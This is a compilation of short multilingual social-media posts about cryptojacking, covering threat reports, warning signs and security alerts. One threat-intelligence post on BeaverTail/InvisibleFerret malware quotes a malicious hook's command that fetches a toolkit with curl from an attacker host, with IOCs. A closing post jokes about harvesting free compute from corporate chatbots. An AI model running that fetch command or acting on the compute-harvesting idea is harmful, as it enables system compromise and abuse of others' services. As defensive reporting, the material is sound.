بطء مفاجئ في الجهاز؟ مروحة المعالج تعمل بأقصى سرعتها دون سبب؟ قد تكون ضحية لبرمجيات تعدين العملات المشفرة الخبيثة (Cryptojacking) التي تستهلك مواردك بالخفاء. تواصل معنا لفحص حاسوبك. 🔌📉 #سودان_سوفت #تقنية

Microsoft exposes a cryptojacking campaign using SEO poisoning and ScreenConnect to target high-performance PCs, with malicious sites also surfaced through AI chatbots. The post From poisoned search results to GPU minin... f.mtr.cool/njgcgjxhtw

2/11 Di 26 mei 2026, microsoft ngerilis temuan kampanye cryptojacking: situs download palsu dipromosiin lewat SEO poisoning. microsoft juga ngeliat indikasi sebagian domain bahaya ini sempet muncul di respons chatbot AI.

STOP DOWNLOAD HASIL JAWABAN AI AI boleh bantu lu cari nama aplikasi. tapi jangan jadiin jawaban AI jadi tombol download. Karna Microsoft baru aja ngerilis temuan kampanye cryptojacking. 🧵👇

Famous Chollima related Hash [48f2a3bfb7a70b97875e56d932ada0d975cd5ee154a99caf7d93550275a1548a]: TTPs: The malware leverages a multi-stage infection process starting with social engineering . Victims are tricked into downloading a "demo project" (the ZIP file) and running it as part of a technical assessment. Once executed, the JavaScript-based BeaverTail fingerprints the system and checks for virtualized environments or sandboxes. It scans the filesystem for sensitive data, targeting over 200 browser profile directories (Chrome, Brave, Opera) to steal cookies, credentials, and cryptocurrency wallet extensions (MetaMask, Phantom, TronLink). The secondary payload, InvisibleFerret, is a modular Python RAT that provides full remote shell access and persistent control. Recent variants utilize VS Code Tasks (tasks.json) to automatically trigger execution the moment the project folder is opened in Visual Studio Code. API Interactions & Operations: Exact Command Run: On Windows, it typically launches a hidden window using wscript.exe to run a VBScript (e.g., start.vbs or update.vbs), which then executes a Python interpreter masquerading as a system process: cmd.exe /c svchost.exe updatedriver[.]py (where svchost.exe is actually python.exe). Registry Changes: For persistence, it modifies the Run registry keys to ensure execution upon system startup: HKCU\Software\Microsoft\Windows\CurrentVersion\Run. System Changes:Creates a hidden directory (e.g., ~/.n2 on Linux/macOS or AppData\Local\Temp subfolders on Windows) to stage stolen data. Adds Windows Defender exclusions via PowerShell to prevent detection of its payloads. Schedules tasks mimicking legitimate processes like RuntimeBroker.exe or svchost. Indicators of Compromise: Network Infrastructure: 172[.]86[.]116.178 (C2 Server for keylogging/screenshots) 193[.]124[.]33[.]71:3217 Most Important artefact: - Main file is dropping dozens of child files. One of these child files (a shell script named pre-commit) was observed attempting to execute: curl -fsSL https[:]//lab99[.]sbs/api/terminal/bootstrap?os=mac&flag=6 This is the bootstrap command that downloads the rest of the toolkit. Attack Chain: Social Engineering (LinkedIn/Fake Recruiter) --> Lure to clone malicious Repo (GitHub/GitLab) --> ZIP download ("Fintech Demo[.]zip") --> VS Code Auto-Run Task OR Manual Execution --> BeaverTail Infostealer (Credential/Wallet Theft) --> InvisibleFerret Python RAT (Persistence/Full Remote Control) --> C2 Exfiltration & Cryptojacking. #northkorea #famouschollima #beavertail #malware #threatintel #happyhunting #CyberSecurity

Microsoft Defender researchers described a targeted cryptojacking campaign that uses AI-assisted poisoned search results and impersonated utilities to install ScreenConnect for persistent access and GPU mining, with Defender-blocking mitigations noted. microsoft.com/en-us/security…

📱 Escanear un QR parece algo inofensivo. Pero detrás de un simple enlace pueden esconderse redirecciones maliciosas, phishing, robo de datos o incluso cryptojacking. La mayoría de los ataques no empiezan con una pantalla llena de código. Empiezan con una acción cotidiana que nadie cuestiona. ⚠️ Piensa antes de escanear. #CyberSecurity #InfoSec #Ciberseguridad

#threatreport #LowCompleteness Residential Proxies in the Wild | 09-06-2026 Source: infoblox.com/blog/threat-int… Key details below ↓ 💀Threats: Residential_proxy_technique, Kimwolf, Ipidea, 🎯Victims: Enterprise, Pharmaceutical, Food and beverage, Government, Banking, Education, Electronics, Industrial, Healthcare 🏭Industry: Government, Iot, Financial, Energy, Foodtech, Software_development, Education, Media, Healthcare 🤖LLM extracted TTPs:` T1046, T1090, T1176, T1496 🧨IOCs: - Domain: 1 💽Software: Android 💻Platforms: intel #threatreport: The prevalence of residential proxies within corporate networks has been increasingly alarming, as evidenced by findings from Infoblox, which revealed that over 65% of its Threat Defense Cloud customers have engaged with domains associated with residential proxy networks. The extensive use of these proxies raises significant concerns regarding network security and incident response efforts, as abusive actions done through residential proxies can implicate innocent organizations as malicious actors, complicating the attribution process and causing potential reputational damage. Residential proxies, which reroute internet traffic through everyday consumers' devices, enable threat actors to evade IP reputation systems and bypass fraud detection measures. Such proxies create laundered traffic that can dilute security alerts as malicious actions blend with legitimate consumer activities. Many proxies can be installed non-consensually, often embedded in applications or devices without user consent, akin to cryptojacking, which compromises bandwidth and IP address space rather than computing power. Analysis of DNS traffic from Infoblox indicates a steady increase in queries to residential proxy domains, growing over 25% from January 2025 to April 2026. This spike is partly attributed to rising demand driven by web scraping for AI model training, where residential proxies are favored due to their impersonation of real user traffic. Notably, the incident involving the IPIDEA service takedown in January 2026 saw a significant 265% increase in affected customer networks, suggesting heightened activity and potential chaos in the proxy ecosystem. Infoblox's examination highlights the rising influence of major residential proxy providers, with services like Brightdata and Oxylabs dominating the market, and others, such as Hola and Honeygain, embedding proxy functionality within free applications. Across vertical markets, concerns mount as more than 90% of organizations in the pharmaceutical and food & beverage sectors and over 60% in banking and government have engaged with these unauthorized services. This widespread adoption necessitates a strategic approach among risk-averse organizations; adopting Protective DNS to monitor and block these proxies within networks is recommended, along with thorough assessments of DNS query logs and installed applications. Ultimately, the report stresses the pressing need for increased visibility and proactive measures to mitigate the risks posed by residential proxies, as their presence may not be entirely benign and often exists in a grey area concerning ethical usage and potential malicious intent.

Cryptojacking is mining for cryptocurrency on someone's network or devices without the person's consent or knowledge. Signs to look for: ⚡️Increased CPU Usage ⚡️Sudden computer crashes ⚡️Fast draining, low battery ⚡️System slowdowns

Hackers Abuse Fake Utility Downloads to Install ScreenConnect and Mine Cryptocurrency ift.tt/M736LwV Hackers are turning everyday software searches into a trap. A sophisticated cryptojacking campaign is actively targeting users who search for popular PC utilities onli…

4️⃣ Run a Malware Scan 🛡️ If your CPU is constantly pinned at 90-100% even when you are doing absolutely nothing, you might have an uninvited guest. Cryptojacking malware and background viruses love to hijack your CPU resources. Run a full system scan using Windows Security (Windows Defender) or a trusted third-party antivirus immediately to rule out security threats. 🔒 #WindowsFix #CyberSecurity

Day 19 of my cybersecurity learning journey. Today, through the Cisco Networking Academy introductory course, I learned about: • Cryptojacking • Cryptography • Buffer overflows • Race conditions • Crypto mining • Access control

Cryptojacking is mining for cryptocurrency on someone's network or devices without the person's consent or knowledge. Signs to look for: ⚡️Increased CPU Usage ⚡️Sudden computer crashes ⚡️Fast draining, low battery ⚡️System slowdown

Microsoft lancia l'allarme su una nuova campagna di cryptojacking che sfrutta il SEO poisoning e false utility come HWMonitor o CrystalDiskInfo per compromettere i PC. #Cybersecurity #Windows #Malware #Microsoft digitech.news/digital/07/06/…

Beware! Free apps may be turning your smart TV into a cryptocurrency miner. Stay vigilant and protect your devices. Link: thedailytechfeed.com/free-ap… #CyberSecurity #SmartTV #Cryptojacking #Malware #Cryptomining #Privacy #Security #Hacking #Botnet #Surveillance #Exploit #Infection #Ransomware #Spyware #Adware #Firmware #Streaming #Devices #Protection #Threats

🚨 SECURITY ALERT: Hola Browser Hit by Supply Chain Attack 🚨 Think your crypto portfolio is safe just because you only download from official websites? Think again. A sophisticated supply chain compromise has turned a trusted browser into a hidden malware delivery system. Here is how this silent Windows infection unfolds: 1️⃣ The Infiltration: Attackers breached the official software pipeline, slipping an undeclared, unsigned dropper file (me.exe) directly into the official browser download. 2️⃣ The Payload: Once installed, it quietly drops a background Monero (monero:native ) cryptocurrency miner (HolaMonitorService.exe) straight onto your operating system. 3️⃣ The Stealth: To evade your detection, the miner stays completely dormant while you are actively using your PC. It only turns on to blast your CPU and drain your hardware lifespan the second your device goes idle. The Impact: The platform team has officially confirmed the compromise, stating that roughly 0.1% of their global user base has been exposed and infected. When official download sources are compromised, traditional safety rules fail. Web3 requires deep, multi-layered defense frameworks to survive. #Web3Security #Cryptojacking #MalwareAlert #CryptoSafety #ShieldGuard #SHPRO 👇 Please check the comment section to see how our membership will benefit you and protect you always from scams and hacks.

BRAVE vpn CazéTV de youtube , debes estar preparado a pagar como 10 dólares el mes del vpn, pero hasta el momento la mejor opción. Los sitios piratas te van a llenar de malware, Cryptojacking, phishing y robo de identidad, tengan cuidado... :modopacoweb off:

I never would,🤣 but how hard would it be to set up a bot that just keeps initiating these conversations with company bots and harvest free compute? Could this be built into a local LLM workflow with a command like "ask Ronald whenever unsure"🤔 Think cryptojacking but already public facing corporate maintained AI. Can Chipotle double check a local AI or correct for free if the local is programmed to also want a bowl? 🤣